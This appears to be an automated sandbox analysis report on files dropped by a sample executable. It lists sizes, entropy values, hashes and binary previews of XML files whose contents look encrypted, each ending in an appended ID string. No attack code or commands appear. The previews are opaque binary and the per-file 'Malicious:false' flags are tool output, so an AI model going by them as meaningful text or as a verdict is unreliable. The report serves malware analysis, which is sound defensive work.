              Preview:<?xml.'.....a..x. %.].....J..q.............$Z.v..K..].....*x..Hg...u.LZ...'......lC..e..%....M.AQk.PIw..',..v..q.8......;.$.N.m.l.......O.T.@..z.8p..pk@...C...D...r..7=...o....z./....Y..Z...l. .4...Z..;/..`.6px.5.p.:.po........K..|-..j..espa...\..'.Z.Jd.5k].D. .v4)......RgR!..L"O..[wLTO.x.1........qn}.F..A..$...S.....-.s...............[..&.+B.F..........e.......?.t!Ql..oQ.q1.~.B.!.:.........L.._+aL.=..[*..V.@.gi.......@...Ya.n^Q2....P.%..W^.La........P..V...wdIt)_...{vZv...........Sw..,..5.....{F..V..>4..|.'.....a....Vo.....i...o....C.DYmr.[......$.._.NjC.{...-9]......%;.Sc]..p.x.7..S.|.%$.../.T...-.`.Q.U+..NM........d.f5..(....n..w.HoP..p...*....(M...^`.9.. jd.h?.G...,C...A.r2...fd.(...P?.-46........W..70v....I......Un..V..0].|/..fi.b(9..v.p...........)..4...]..0j_\...(L.e.ct.s=..z.V..13j`*...?.{'v...70..-H..&.......W....Y.....*!M..[..f.r+...w(.....bI?....B..4.XC^^w..l..J1A_.H.G,...n.^S'......O~...^B..(<. ...,...".h..5:.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):7026
              Entropy (8bit):7.974731832665579
              Encrypted:false
              SSDEEP:192:7TvTcjKEa+x6FOFvo6324lvfm1Zrmrel11tEcXB:37jEahOFvHLpm1Vtb1tEe
              MD5:814698AAE9024496458816B4461458FD
              SHA1:3579DC4BBCC55DF7145A23E0ADA52769A558918F
              SHA-256:EA602BBDF9166A6CFB92F6189BC3671EF1197E5D91C032B3F12932D004AD3AA8
              SHA-512:0A5562DA2321631DFFA2397398F30CCE80B99E1FAABE084EFD1B28294658B231352CB557539AFA4F806A33E7DE3ED140AD9D186BAB7C3038F32A2793C010708A
              Malicious:false
              Preview:<?xmlL.z.]...:.....5......F...S.P. V.fjH.^.w......_|..2...".N.;K........<...Z9...........T..).tlj.?-I.....Xu.J.e../.$..e..o.._..A.<..Jr...d.y.tn.....oyz 8Q./..1..O.}../..(f.c.o_..Z......-U....'A.O..........].GD..-(..h...v...`.......3%.0]...s.......5..x...-....R.......Xh.O.r.....4p.......y.o.b.?Y.a........N...b.p..T..H.X%..f....O4..m..j4t..a.U...2&,.2.k.5..[...a.!O..... ...rS..A..C26.o..Y.8..q_...zb{~...o..9*..*C..lCk......V.).W.%.....V&P...........+;...2.!.L/..a[..J.W.6....@W.,.o.vq.5Ys.........|.0:..Urj{..lb......5.=..I5>0..J..;DT..q../.......h8.G.x`....M.u...|..J.4.u.L.V.BU.Ob;.Y.....D...;......&.!..J..9X.....0`.>...C]..P.V.N.:...e~.Q.n...........)....s;<mZ..@....3............a...k.h.G..{8rZJ..K.2.->......t.+v..Z2.{..|R..{.\...0.....,..@..e.r..UMF..*.....z....}..5.d......`..Q.\qv.Y.~...:R_....@...3...2....u;.k.K..Nry1...n.6|.@..b\ ,.O(.........>..6@.%.3Q.....6.=.GA[..Z..tB...F....p.,h\..RIz.r.......m.09X..,.L..-CDC.P.....u...Du-."..o.)7h0.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):845
              Entropy (8bit):7.724057631865323
              Encrypted:false
              SSDEEP:12:FOfFxTPkF5faQNoAw3P63OwMyn57XiP2Rdg/cReSLj/GKJUXKYoxXyAtnnukIciD:FOfF2Tlfw3P6ewr57XBaCFLGl3oxFMbD
              MD5:D7F2EA498FA3D39B57E49BB9B53259A0
              SHA1:8882E31F4ABCEE7957C6068283CFDEDEB79BFC46
              SHA-256:18D0A64FA615A877A48059B2D67AB03593D94C8A13C659788DD6CD53C5370510
              SHA-512:A6A7202972FD39E32222A433C8EE819DC4AB97E3A849ABD7809693D4598C0F4F56FE52932BDFDD412A6BE98F76A9AAE8FBAC7C807428502B6778BD5444E59C48
              Malicious:false
              Preview:<?xml.)..t..A........2...6&F.Z.........x..@K.1 E...>|.b.Z.x.[..e.....N......:...U.4.. N...y.s.XJ..Z..V.1.@..:$5.).$.l.. .&.\2...'M..t./..1.>.N.O.>.. .%.....P....Z.......v.}.%n.v....&B...._.u'z..'.>.Y.i..S!.^.>.....z....4!D.Yj.......T..X...}W4..%.H.5....|{...`...3d.@............'A..7...8snV.A&._. hq.5.Z(`..8...7z..e..)~.@.bA.z.s...>g3aXEH...S.4...q....d.M....=.Q.......=..V.w..R[%...7dA..0..c.E.~....1..xvLO...z.8.F..`..O..j.>.:...u...........*HN.b..t...u.7.x.E........I.....V.F&-.6..VM500..a."-...b.....SY.1.....y.=.z...f...'....<..Q.|.}.........\zp9.U.......#....a...X)K(4...2D.-.v.B~...,...Xn....U}..K.#h`.I.....)"p...}9...q..|..J.T..-..._.cs\~......GJ.@.)..+4<.?.'.R.O.R...C.VH.u ..OI6..{..4...#...1......s......#~...itp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):946
              Entropy (8bit):7.755921521137691
              Encrypted:false
              SSDEEP:24:FF+WEV/yivoKu1CBsygl3779QDQ0PjUbD:8voH1CBsygVpAQZD
              MD5:B34072D2B390249D9A920FCB493A580A
              SHA1:940275128B592FAEB5E23166A585C2F375603A10
              SHA-256:0E13ED027CE5F716A2512A7F5C7AE179D93189B1E99FF20F84B867EE75D052AC
              SHA-512:5D652FE0C60AB29FDF37030C4BE5BDD6DF566893566D54DCA01D853BC09360DF892B441D37531090DEDF9AABCA33C474DC6D5D2E6FB1F2F3DD88F21BF23CAACE
              Malicious:false
              Preview:<?xmlR0..mZR....3L..&..f....`.n.}........#O.Uik....t ....P........b..%$-....a...B5/.....nHJ.1.$.....Z........r`e.R.....a8.m..e.G.U)._G.b/.)...@<.W.=........?.0.g...D.m.f..p......x}.d{.4...C...P....V].....M.rmu..[.Q..u.....`.-. H==A...|....c....4r.,I......Q+......./$.m..&b..i....Y.WI\....q.V..r...........K.D.._.o..f..m..n2J.(=7.G..A.r_.-...c...C...... .C.....y..'.....z'.6!.q....//....;6........9....}...J.......'mg1T.*kwE........V.n.R7.sa.LC8I.Va...P....k.p.... ..C..di.z....8./.......C..........,#.\Oi.rxi.....N.\.{..s.Y_*... "...%..N;....?..Q3..s.:..AI..HJ.0'.$..z.&.mI.-.|...;..JHjS..A......&...&w.qi.Q}N...n0cAy|...l%...~y......U......K.JYeWA......$.V$W.....k..{.m.Lo.!....._.N....;i.1..cf.Dn.;....M....N..1..B..1.\X...... .`......|...kM..*.=.3.....Y......@..W.`...a..N.!P*'...-..b.'..=S{..aS.A,w.c.mxB.....ud.:tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):842
              Entropy (8bit):7.721864983807327
              Encrypted:false
              SSDEEP:24:OQG1iD/ivVMSQP1vMDjRHuZ6dFXxjfnbD:OQGmityPJGRVdFXxjfbD
              MD5:253A53E78352FD4F1A35B0B6AD51CB8E
              SHA1:8F36AF80E593F62EE4E1225F10DB0D4E3883C2B3
              SHA-256:3EBB4C2089D7708903F06B034D1356FF2CE7FDDBF75F09850A9BA0CBF3279063
              SHA-512:783BB908C7583B6E0B5B1AD988EF7B9027443B30E29CFF70DFEDFFC88DF476AA89F30C0EDC211DDFFFBB1E8EF6B9BB0F8D0BA0A3096BECFB8FAEE7FDED7E49D7
              Malicious:false
              Preview:<?xml..'.c..'.M..K..U.fA....g;...6'..Q|.T....[......m....v...VuS.~B./..V....q....u%....A].......Cm>..X..sKZ\]Y<#....|T..]....Z.T.@..]...=.p.....P..<.[#x.+...[.......r.E.....j..H/.Y..$...d......Q8....K..r....E.-...wk...0....\...1..C?.....$..t..N.......p..s.....7.!w!.X.x.TR..PB...u...G...4j..`H.'...Fp..I?j...U:..w.R.\.+.+....0.ra&p..T..N_4...G....G.n.y.@X[.2h.-K.b.kv..Y..-....V.......TpS..:.....Z.l.........\.mqt...).y.KL.Zk.Q..k...e....in...W:|@.%........8..z.S........8.m..SL._.-m2.{..G=8,tY...Z2.Q..33.z....&..Bdx.I.M.....c...Luv..E..e....P...4e{...N.../...Z?)V'.W..q5Z.#4ohOpY...V&.....W..V.<P..~JS}jz..3_.W.=1...Fl.NIi..s...........c.}.1..1...-..F1....o....?.B$q....D..G:]....).WT..<.kC..V.....T..\..#.{...m.....l9x{..O..B.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1191
              Entropy (8bit):7.840273747151703
              Encrypted:false
              SSDEEP:24:LTK3Uo8t+cdwX/lkPpmzMcNlWl1B1FT0FoKtnPUZtXI6dlC1IwiaAIbD:LTK398t+IwXdCpm4y87OOKtylHDb+D
              MD5:A847A1ADCFEA5039038C71705AD3D2C7
              SHA1:33192DFB8023F03057433019FD2DF43810CD9D13
              SHA-256:1653096417DCA2CC76E0315C226E003AABC15B06155080CDB804200F9C9FB3C4
              SHA-512:B574FE26ECF58C0743F0DE43282F73ED4624FD6FCD3F110D03721B9FBBCC0E4071456349DB55D03C8D6F42572E93AFA10D2A5676EF9765EEC6F17657AEEBE1A1
              Malicious:false
              Preview:<?xml..........6p.y#.. .9.!N..:b.|(.l.R3..t......t.6N.v.E!....e3V... #....\n.;h{@......e....C$.M......n.......-.^..k5,.v....~..4.<...z.E...).Qv......[..z..M..4D$W8..e...+...F.D66.E.....G.<.P..R@P.q\l..Z..^Qn.13..N<....B.....m. J...u...q.X...........o.:+.....`. `".....\}.~!.W.c..p.4.a........k........z.|3/..V5~Jq....N..ZT..2q}W...F}..E.".M.o...3Q....Y/V...v.A....=.3...*...NM.r&.....~..5"(D6...*..-...[.. L..I.{...kD..e...B._.....]..F./...>P4b..|..O.......f.......j....@.h;QQ.......":.....O.M...D.>A2...Y..N.E.....R.1....kp.T.......70n..#..=...G..F\.v...C..v.B.."...s*.]<.E..a...PX....h .u...o.AU@.k...1(.";.i..H.._...`)...~Q..A...#...*...nD6q.'.}B.S.)5=...m..,....z.#,...[M..........c.......Du....v..'..B.[...S..*..<..|i<8BI...x!41....~$]0...@*-..a.M@L.....`[Jf.a..8b....R....Z.E....q..I....L(.~...'.(..=..|{u....?.b....p......9..2a.8v%.......e&.#.....p.....)w..GR.Zfs.U$....IXI....."...=.s.<....O~.N.U..jY..;y!;.....h..N.....&.+qn.^.2.r[%...L.a...F.......
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1366
              Entropy (8bit):7.847690416412705
              Encrypted:false
              SSDEEP:24:gQMWrp+udRtoFOtF1TkQpvzxBZQuyFiom7Ef9oWzd60Zhn+P+Qf2m3PbD:gQFnHomxBZQuykoja0rn6+eHTD
              MD5:8AF0F997C6FAD5C8E4EE3EE2FE9E3480
              SHA1:6698973574F70BCD8487E7966819072E5A9D600B
              SHA-256:6BB76F45530F68BA2DD2E46795BE607A06BE48764E407A160ED15917B49B343B
              SHA-512:DF260F13DB23B73EEAA3F5B273B2EFB8AFAD3A7C2077E4F1B49FC150D5090EA3C2D686EBDD9E32CEC2683AC0DC550AEF9F0647A7A08E8140F2384F8664BA9ECF
              Malicious:false
              Preview:<?xml]......Y.}..Q1......jk.D.}..L.mQq.U.p....(.I..Vu..."../V..-._.?jk`&...O*9.ZM:.8....K.G.mV.....WbHV.{.X...wu.M.B8....5...<?.l.}.7(..S...y~.q.1.#......T&.Z3..%..D3'...X....WqL...|9...uX@.{........1.....Kg.kv{.?a...g..H-6/y....^.Y...x....44.....gtsB...AU;r{.rg{...:.....`N...H..x....}K.#..-......m1L..kX....D........q.>.d.........^.AP[..m...q.........G.nY#o+.m2.Q.....MC.&...]...fE0.k..x.J.......a.Y..r.8...p:J.~.V~..=@..L+3.ud...0....8...o#.....g(G...o...|..c.|s.Mh...3.....S^~.;.E)..U...Hp.G..,P..f.g../.W...j..u..p.......B..1T..02.c..&.y........B.?l.oAN|in..R9[....K.-...../=F.z3.C......ol.v.D.}..u..E-$+.'.8.TFL......L."k^......ii%..y......e.. (P7....#.#0K.t$A1...#/.R.~.,W..0...4../....R.x>.y..........$..'.+.Di.gOEP.t-...nM.\./.Lq...^.D...`^..}0s..Jt.c.d.....M..|.k...qF.$..jA&R..$..Y....Yt.i*".2$.R.`..c...C.{#:..&..h..1.(.+.t.r\...Go.R)Z.&..-.....)\.q."'....B....Y../X..@..&...+ ...^..y(..D_..i......./j...ty..0R......F.=[(.u<%C-`.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):728
              Entropy (8bit):7.6375258248047
              Encrypted:false
              SSDEEP:12:Jrm979D1jwchT3ZdFIMuu/Ci9vV5MRk8IIzruVUnW1iPwB3VXm+ukIcii9a:tmB9pBhVdN/bFVKXzrsayiPy35mZbD
              MD5:9FE1480CA2E5CA313BFFD12040075E7D
              SHA1:6DA350FD4BA5ACD885684C59C307140343F46F02
              SHA-256:20D5DD77E7A7D3CB5C103CA2188E5EE0AF3EEE60B71F67466B3538212D75BE8D
              SHA-512:6FC58BC1F99EC9F6FCA13403CBCE51EA327F36BD57389FEEFC869FFE7A6D82588283B878249B046BCA38FF20E88A54F6FC946A9CAC59E878CE4E0A1B07D1D0CE
              Malicious:false
              Preview:<?xml...@Mw].8w.bs\.....A..'8..Y.T.T...r'..h^...$zEw.q...o."...V..A..1uj..F.....;..yO\Lw...V.K.F..pn.....:...w.Wp...W-uQ..B..a.....-.KYk...|.to...P.0.....f........7..e.@..4G.V&.<..B(n.....= f.+...l.;.4..9.oLRs[w..)/.b./Of.m..2..D4i.;(....^6^....;F....?0.].....4..=KH....AT........5.&$.3.wFz...?-o..7...C.+........Em.ewu.c..u...w....4{.'.XMn.....rc._..'..3..B...)p..!y.u..s....c......W..U.Ta...M'...L....YD....P{...@.?.XD+7b....S'.a.r......@$D^[QZ....d.....8.,L.......Vt..u.....l\..T|.R...c4q.O..Q.$........=o..........7FV..J^,!.P.A.*..-YF......G....>.U^).3.....[I=g2.j..@.V.,/.E.DrQ...t.E.....9..P...z.9.Z...9...k..D..P|.5t.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1088
              Entropy (8bit):7.811996110110815
              Encrypted:false
              SSDEEP:24:6pI85e5MmmcCOoGP94rJDFg8YpNU1wuX2JV1ObPbD:6qYeqmmctoGP941GNU1wb/ObTD
              MD5:273A8AA5609289A053EAC9404C6C9E35
              SHA1:82FAFB2D228D86749A01641E003762D0281C449B
              SHA-256:1A0DDD5F12F681A046B7AC19F03374C3E46EABB706F67C90BF4B18239F31734A
              SHA-512:A7E9EE873B99BFEB507299A327764A24D979E1DF05B26EC0C888534F39AE9A9F2A288B99069B961B0EA8B4BFF39FC6AE9EA2C3E5778AD6F966664A8108814E0A
              Malicious:false
              Preview:<?xmlL...%W..(.n.d..6"s..,.L%.++.VP[...&.rt.*v'..e7....V.7.{........|......u...ia*Z.U1.V......eI.....D...I..@7..YT..e-..^......M.-.A..W.."lE.)M...PP.1+~G...`D\...z.).UW....p..?...h|...A\.)Z.0N7...........gf.....&.R....q\.Z..6|_........*..7... o....6.}.zwU.e.,..c.....q.9.o...8.(=p.Cb.......U...)..`.L.`.u..............C/...y..5.......l.?8.....>dj.."=?.y...N....\.*....]....&/......:Il.a..Z......L6.....+]8).Y1L......e.Zy._........r.h.@>#Y)"xc.."..x.V....C.]&`V..S.h....x...;.s.....R..v&...a..XY..zJ....k.2.... .S.l....1#.].5..[.o_p.;/K.8H|.z..ak.....x...K...T..L..T.5....7n..K.:.-....x.w...>...DB.x.%...ot.Y....r2..n..A.o.b......is...=.E.:..~...d/I..\eo.I..^..j..{.>.6%..j.*.bN.^:.....'N...o...O.q8. .|Ir...M....9..5?-.3..h...t...<.....b=6kc....%.$\..1o.s....x.t..w.-..8..!e..Y....^-...p}.Kc.Z.4...O.V...W.P.4P..%8I.....RG..Fb..>w.T.|.-+...a../.D...d}...o..w.....bCByK......X.....@..GH.q^..:.je...j..;E...#.>n..............t..w.O.?.UR..-.Yc....MWHN.g...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):999
              Entropy (8bit):7.76321253608502
              Encrypted:false
              SSDEEP:12:uU2m+Cr+KBsDCK13w91oa+1E0NxOTPAKW50rUf90h/rZRFLupYUhNxJRBDx8Muk6:uNaPiWKQ1edNMTIarBDDFLuvNxr7CbD
              MD5:8FF525AFB1AEA0DC4C5B5DD21B0555A6
              SHA1:36DD6975A4EB72D4A13813C9318694D5EC395841
              SHA-256:0030BF8CC7D0B614C2FEBB27D3CD216973E2B4BD67EDC3ABD627A45A96D12745
              SHA-512:39F58AB42B06A250B19A401A0592B41C42C1BC1539520C15B0F397D78C4180BC638C03C936F23D9AD883CDC346DD669DE5F05959CE7777EC1125AB68FA075964
              Malicious:false
              Preview:<?xml..iN<....Sq.X..6.r.=<.s......|.?"K....G#.p..J..ZL.:|..0....\.U........'.....:.*...S.p..v..=ES......SD.d...>Y...lJr..e.z....EJ.Z=...b.......D..7..k......*B...w[.N.......{=s@\..K.>.....L=...S......F......s.J.V....W._5.g.e.....V..(....K/..WqB....t._.mp.H .b...4..,..U..SG.Vv..a.......}_#.1..L....sbt{#..B.\...>.9.z.(0b....6<.$.....me..L}.ph.4h..~..!7"../.D..{M..-I..qXOJ#E..DY..B...Av^.#l.|.x%Z.=,Gc..r..x[e+..i..%..m..P..?(5x.{..{.}.7.9.n..a..{>^/...R..+<...J.n~..g.....*.......g.r"..?Cx81I.l*CA........&..ZG.....4.q.....756A....+.$Yu.....>......9.!.J.....\...s.m..4r.......vd.8..X....72..8.1D.o..)7.....~.d...j.u.tR.Ol4.A9_W{.C.6L-.47....`,...~.>m..@+...K.'.f..3....Z.N.|O....p=}.Z.._q...2.W...|.T.ad..^v...a.p.."C.#...D...........dt..dO.....5...h.g.i.m.<..O..+..SxD..$.|...'Sh..^-#<Q............j....?K..N.....D\u.M'<.<.......`{[...?.ui.....~+.l....`....../....;......t...~tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):4446
              Entropy (8bit):7.963948071715334
              Encrypted:false
              SSDEEP:96:iURGF8DGCRhU0SjQUIpwfKo1YzeQ/5hWcEuYLc/I04E9GYEGK:1RGF8DGeUvzfqRhhwJL8N925
              MD5:A8241256C92C63C83C1C3081E78943FA
              SHA1:A6EF59D00E5E32A64C42F3B12B7AC59CC7600828
              SHA-256:0BA7A58884AC5BD00025BA8AA000B4C09E9E089FF9C243E0775B519440992A9B
              SHA-512:C7959DFFF716EC2BC460C9D8FB04C35B6269042C7ED73C76ED2A779F6E48C11885C1832997101212B7BE224C21DAAC62865C904BB460AE3F1D132856A4816772
              Malicious:false
              Preview:<?xml....,[.<j...[....k... ;.......%...N.>q...7gW.).]...-.i`3.L0...q...{F.hhfE.1*.!L...8......=..h.......m.~.~...%..Z.....!c.:..$.k..S....B.._.mE.d.QT.f.n..v..$..Y~i...C.2...6?...z.y.V......[...8....W&....o..'..K..E.C...A......Z|/..=.d....byA....J..$..S.M.u.B.q....v...u...{R.v..?){.n /..(iMo..6..1.%...._..f.O..A`..[8x:...|Q.........G...p...S..U..\=/......3L.....Jm..ls.F.....3Dx..|p..!...u.].Lqc......(.l......f.ZDL..i....(........K...B*..><&z,Y>|..@...Py*..:......"...l...[$...N..[...(a..s.d.s.0.hH..}.......$Uo#...............icw7.0...g.T....d..2.Sw.......H..\t...._/.k-/.&..~..q.4.m........,.v.............v.q...+.....n....z!\2I.V......,..c{..d^!Poi..C.Mu.#U.=.M..."....(...d._......A>9..m.......;..&..:.....l...)*Si5..........-V....+.P..[.@..{....w.!.N.=..>G......y.*c.7.t.......{L:0)...Q.9.'.UX..*n.....^.....6.%6...s..h...+/..'...Xr.f........7^I!..@...v.....P_..U.-.,.M../.:Z...J4.D\2I;@.3C+:..n........r5.T....Qa..@.z...L.....{
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2306
              Entropy (8bit):7.909684280887096
              Encrypted:false
              SSDEEP:48:grz22aNo8f9PHROUl4Q0Pn81yC5VUUKGM7uD:grzieQHLhyC5VFhKW
              MD5:35117F7C29FD08DA2265595D3C1E49B1
              SHA1:AE5D1066AC703A01E0CB333359742FAC0708F214
              SHA-256:D28833CF216AA18AF986E54307E244F0E631450138D17CC0D69081863663CE01
              SHA-512:A7ED0BAAA3500CE555F03B43A7E44C44632E9B145A5A0754BB464751A80744FEC95D4B08553E0E1A486916F612B5C95CFF14A94F6D65472722FF147432FFBE1F
              Malicious:false
              Preview:<?xmlAIrA..q15.$.k5.y....3./.Y=..t.e..I....p.H.?.S...M.:.K..:F..F%.$m.G.eW.|....q.8.$QI..xA......a.V....%`.....-....Iaw0fH/.V.....d..9....X.f...^.[..........q...U.`.G.'v.0.DN.n..~...FWQ..$..g..J6c..ZD..P...[.....e'..@..E.'.L.......d.I`..sw..n.g;.g........*;T.].+.RF...:).U...cT}.......xP.m..,......u.......q.437'<QG........w.IYba>T....^...o.%pEPdRP.I.k....|...s..'R...w.....nI'.Z.wQ......0....#.....o#.q..i<@....A..b..0.I......j..8v...f../....3....6.W....K.o..H..a.....B.p.O..^.X49. ...E3}.}..f.....x.............?\4 J.].B..f...].|qp.1EX.\..$3S=r....1......[v...S.R.8...7...\.u$CD;)v...../.0=......+...s6....)z.Y.D..N?p..Uw......%3..Y.....i..9..W.3.|.U....H'9C|.~..+..;[.=.&...Z..........[/.............g~N.M.e....:..c.1.?......L...@.TCVX...v.o....my|..^...V../\../".<.....3P.?H...v....MxL....q.3.9..e.&...9/.*.Q...2.....+.&.X...lt.*.Mw.......7...C.h..[...+...f..:..e....:..Cf.BW.*......J..A!..P...;.V...~>...c$1..2.......(.....C...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2376
              Entropy (8bit):7.915404186435797
              Encrypted:false
              SSDEEP:48:SdJfYlKulfViOrn2igmzEPKaW2rUEyT3mHiiTD:OJQlKulfOZ/W2rXyrmh
              MD5:C04A0B012D88C065A4DECCE492054D75
              SHA1:81B24503CF55918D1457B003779DD52B4552EDA5
              SHA-256:AB95E05DC5928798F5B9378D9B015D459F1CFBCB780778DC83C2DA7E5B5BD3F3
              SHA-512:C1AB1278C18F2276ED880E13C42FE2430E1CE96EEB8A1B644D432EB986ADD298D70B087F85F1B8D138F6FACC4D3BEDE9562C14E2D133860AE145C8E14B6F5202
              Malicious:false
              Preview:<?xml..\{1B..2.A^..-:.b./.Z..r.....r.y....,...n....u.k.....|..#.>.3..4C....~.`...rk.<..q.6.Q_&.$F~./..|.%A..W."..w...p.@.a0Hl...I.K.......W....7M...E.j,R'..m.$c.os.'..L....'...O}.R......y.?ce..d....kf.<T.jV..:;.B...DH._3P.M.N\.8G.-H....]S...x-...-}...I.j......V....3W|...k>...j*......o.Hg{..z....i8&8....1......^.z..@...i.VK.j...<......4...N"t,fhe.....=)..0...qD$....O.&h..p'.c..p...uN6.....W5.]%...X'.@d'.j#./...&...mL^.*%.;....u...\...x[r..=.<.a...".o..;:./......b.a)..B....*\..U..Hm.^.$.....).{...%.......R......6P9....hxCd.r.;..D..I..Ze...........4.[[.~...lK.:....^.10i}IfA'....9h#...........Ox....U..AO..>4....P.....I.F@W.(..<[._._...#..*.R..I.k....S..@....$......!qx1.UmM..q..D.?.7..Mw.rv+Yw3.........M.).+...\....s......Q.1Q+].........R..]....#....... .R.m=K5.$. ..O.~...}........^7fT..%l-'A]3...3)......%[W.l].z.Ai.[....kPl......A1...o...A......&.....g.....3.k...)...l.k..z(~.q@..Qi.......g,z.RU..F.......O.(... .W|.F'...|.....>.....+/......I...p.TV.T
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1043
              Entropy (8bit):7.816367153929224
              Encrypted:false
              SSDEEP:24:LQEj5EiKa/1fdHvdT8ifkvqd0NvtbYe0gKYhcBUlD7zYJbD:ciKQvdIifj0VRYbgMBUlD4D
              MD5:B7D23F92BA6774AF447460A86FADD663
              SHA1:A27A3BA2381E438001957F6E882E407F942A4A8D
              SHA-256:72546E694C58FF6642A0F90CCE9D4EA0DDBF7A5DDA87C82BA63A67D1387E4B28
              SHA-512:4A1C37D964CCF9232CAD4C6F1501E7397F183E759CB0F1ACDC8BCD9CA77805643B480193B1697E83312D3D561393F458BAC38DF24468C9EE9A93AA5C3AB7DAC3
              Malicious:false
              Preview:<?xml[.n.c...rE..T.VW..\F.N..]+.D8..P;...Y$.bp.f.......d.j.J...T3....A.k.'.....VO...N.cc.0..vCS..Z....U..d.z.'k...,...>VE...2..j.YlELh:.L.....:..A?".A6...P......e+.Z........}z.$.}g. ._l.......9..|.........{....^!.k...I6.e.'ZS`.UAi..=..>m....'P..n.Qi..!q. .....K..rW.7.JP....2=?.......y.61.=...K.<x4N.s.-............w....{.uL....=A.d........vi...ON%..b..o..&`....+Z?..@.*...L`.=2...Z.A{a..UKQ!A..kJ+...jL...F..>....3..#_.3........npk.......9>.....&g.5.......*.....h0O.L..g..Z....V..... Yn.A.o.}$\K"?...d}..T.*..S....4./..h.*.LJ.0.r.?~^MUw.'...C.T......!?..\c6...9...\...._N......s..j\#.V.>.'...o..|..[.* .-..A.i:.Sb.......|..-VH ....p..6...~.Y?....R......t....Z...f.a. =...*$....p.-..y.0..M...2..L..}f;]........tJ....{.....%..".*.~....W..........C.....`.F.$f..*..p.S..4...;...8...z.....E.9....6..l..:..X...,...RN..i.tq.K.......$..7...p..2.X`..KJP.1.....14....XW.g..m.....f.b...........B.oc...gG..)...H.[..g#Y.Zw..Tlc^..e...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):961
              Entropy (8bit):7.772612729655663
              Encrypted:false
              SSDEEP:12:KWARS9rNV+5tY9EkWVlHkzpWt2YwvvZpKYM8RO9cGtlAfzd0FRxRG3BS6EJodHEr:tVru5298lElSCM8RWUhErR2BxYoPIbD
              MD5:BFD8FAA5D9351AD3BCE2937D5932DE36
              SHA1:7EA98EC459602EE5CCFFCD54D2BA77E54E9F5071
              SHA-256:74D0996A7C016083302AF6D2AB9E3D36D3F392D5CE82912B82C61DFBF89E7AEF
              SHA-512:4B00EE723E27E7EFD7D51F86EF565554FCBD59CF388DE7D965586E9DE17D56E63D8B07973C2F189B99D049AE0905166CF5B726B749BBA77083EF349D840093C6
              Malicious:false
              Preview:<?xmlJl..X5.......,'A...G..W.u~ra.w..y. 8^..u......[..~..R..........^+.d.u.X)...s....Wh.<`.@%i..~k.$snX....>.y.(...%...S....j.a.n8.m..0)..t.....T.pZt5.c.g..@.~v......r...v.G.2l'j.Y...T...t........L.nA....m.T%".D.c6......P..#L...A..R.....1.Hc...L...F.5U...mD.....(r....&.'so.9.S....K.|...8YH...kde0..~Er.r.L..k........r......q..-..E{.....BK@C.%.gZ....g.S,../.OE%W..>.....z....vr.v\..>o...Q.?$5n1...1!G..k.D-..<.eC'....*.^...@t.b.H..\..S..cT..{.._Y....|R..::&Po...cm...b\j..h.z&'F.6W..e.A........4/.] .x.!__2).AqaT.y8~Z.V.....H.x.s.yKg.;..)b.uN..]..L.m.. .....[,lM...bmv..w...&T...}..j..M...k...R...E.WQ9. `..V.....1#.w8-F....'...z...N....k....jb..x{f.s..=.A..(..../..5J.Mt.. ..!6.........^.SA., ..?...ON.W=nO.B.>...Y.v..S{.....D..v..f...dQ:...q_....ur6E.w.2GZcs...M....a.Y>Z...N..z...q...RC)....X.{..{n.........g)f.$.mm9.4<Dy..(`..?h., 0.k...=7.#\tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1126
              Entropy (8bit):7.785289864466465
              Encrypted:false
              SSDEEP:24:hgGbyf//It5yw9FGnYjnpyg1BppHtTsFTz4bD:O4YIPy8/jnzDHNTkTuD
              MD5:A1E51051E1A312F088B9D9C11CCA6E1A
              SHA1:3AD180F90FC71C64B850C9B5187E65F9E1B7CE5F
              SHA-256:789C99230EF7D817CDD4F68FF7745DEB71B91C3A29F5E371AD90DAA1118F9DF7
              SHA-512:5EF3B41BA8A7352306A6A00A2085B1412935C480AE112329BB8AFDE851EE350A5D21812957B8E45B6646CA8196CCB46461DD3B9FD5183E0C6DC2F65F2B748C68
              Malicious:false
